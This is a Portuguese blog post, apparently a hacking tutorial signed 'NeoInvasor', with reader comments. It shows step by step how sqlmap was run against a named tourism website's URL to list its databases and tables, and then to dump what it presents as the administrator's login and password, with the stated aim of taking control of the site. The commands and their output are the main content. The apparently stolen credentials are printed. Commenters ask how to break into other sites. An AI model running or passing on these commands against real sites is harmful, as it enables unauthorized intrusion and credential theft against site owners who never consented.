Depois de ter o Sqlmap no Ubuntu ou backtrack vamos a trabalho.
comandos:
./sqlmap.py -u 'url' --dbs
./sqlmap.py -u 'url' -D banco --tables
./sqlmap.py -u 'url' -D banco -T tabela --columns
./sqlmap.py -u 'url' -D banco -T tabela -C coluna --dump
Explicação:
- A url tem que estar em aspas básicas ex: '
- Dump: Pega os dados de uma coluna
----------------
Abra o Terminal Digite:
cd /pentest/database/sqlmap
Agora Depois de Você Ter Selecionado o Sql Vamos Explorar o Site. Fazendo a Sim
./sqlmap.py -u 'http://www.dminasturismo.com.br/exibe_noticia_minas.php?ID=129' --dbs
Der Um Enter Pra Ele Listar o Banco De Dados Do Site.
Nesse Print Encontramos 3 DataBase Validos
[*] dminastu_dminas
[*] dminastu_mail
[*] information_schema
Agora Vamos Explorar Essas Colunas, Para Podermos Encontrar o Login e a Senha do Adm Para Nos Podermos Obter Controle Do Site.
./sqlmap.py -u 'http://www.dminasturismo.com.br/exibe_noticia_minas.php?ID=129' -D dminastu_dminas --tables
Então Na Coluna dminastu_dminas
Encontramos.
+---------+
| login |
| minas |
| turismo |
+---------+
Agora Vamos Explorar Essas Tabelas Ficando a Sim
./sqlmap.py -u 'http://www.dminasturismo.com.br/exibe_noticia_minas.php?ID=129' -D dminastu_dminas -T login --columns
Vamos Puxar a Area De Login ^^ Logo Ele Vai Fica a Sim o
+--------+--------------+
| Column | Type |
+--------+--------------+
| ID | int(11) |
| login | varchar(255) |
| senha | varchar(255) |
+--------+--------------+
Agora Vamos Pegar o Login e a Senha, Ficando a Sim
./sqlmap.py -u 'http://www.dminasturismo.com.br/exibe_noticia_minas.php?ID=129' -D dminastu_dminas -C login --dump
Ficando a Sim no Final Olha
+---------------+
| login |+---------------+
| dminasturismo |
+---------------+
Ja Temos o Login Agora Vamos Pegar a Senha..
Ficando a Sim No Final..
+-----------+
| senha |+-----------+
| receptivo |
+-----------+
By: NeoInvasor
E-mail: NeoInvasorHacker@gmail.com
site: corp-antisech.blogspot.com
Twitter: https://twitter.com/#!/NeoInvasor
Até Mais
./sqlmap.py -u 'http://www.dminasturismo.com.br/exibe_noticia_minas.php?ID=129' -D dminastu_dminas -T login --columns
ResponderExcluirdai em diante nao to conseguindo mais nada... help ?
Olha Esse Video...
ResponderExcluirhttp://www.youtube.com/watch?v=91aJFGTm2cY&feature=player_embedded
eu assisti o video amigo
ResponderExcluirfiz aqui seguindo ctrl c e ctrl v
e no final da erro 406
e como eu posso fazer para saber se o site é vuneralvel o suficiente
para fornecer as senhas, eu testei alguns sites com php e nada =/
Olha Man, Se Você Fez Do Jeito Que Estas No Video Então é o Site Que Esta Com Muita Vulnerabilidade No Banco De Dados Que Impede o SqlMap Extrair o Mesmo ou a Falha Que Esta No Devido Site Seja Diferente... Ja Tento Manualmente ?
ResponderExcluirAgradeço Por Esta Visitando o Site...
Intendi, Não teria outra maneira de invadir usando o backtrack ?
ResponderExcluireu realmente gosto deste turorial e recomendo ja compartilhei pra varios amigos é nois NeoInvasor parceiro
ResponderExcluir